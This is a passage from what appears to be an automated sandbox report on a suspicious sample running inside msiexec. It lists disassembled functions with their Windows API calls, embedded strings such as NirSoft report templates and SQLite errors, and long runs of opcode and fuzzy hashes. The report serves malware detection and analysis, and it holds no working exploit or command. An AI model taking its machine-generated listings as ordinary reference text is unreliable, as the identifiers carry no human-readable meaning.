                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy
                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                • String ID: 4$h
                                                                                                                                                • API String ID: 4019544885-1856150674
                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                • memset.MSVCRT ref: 0044505E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                                                • String ID: PD$PD
                                                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3592753638-3916222277
                                                                                                                                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                                                                • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                • String ID: ($d
                                                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                                                • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3015003838-0
                                                                                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
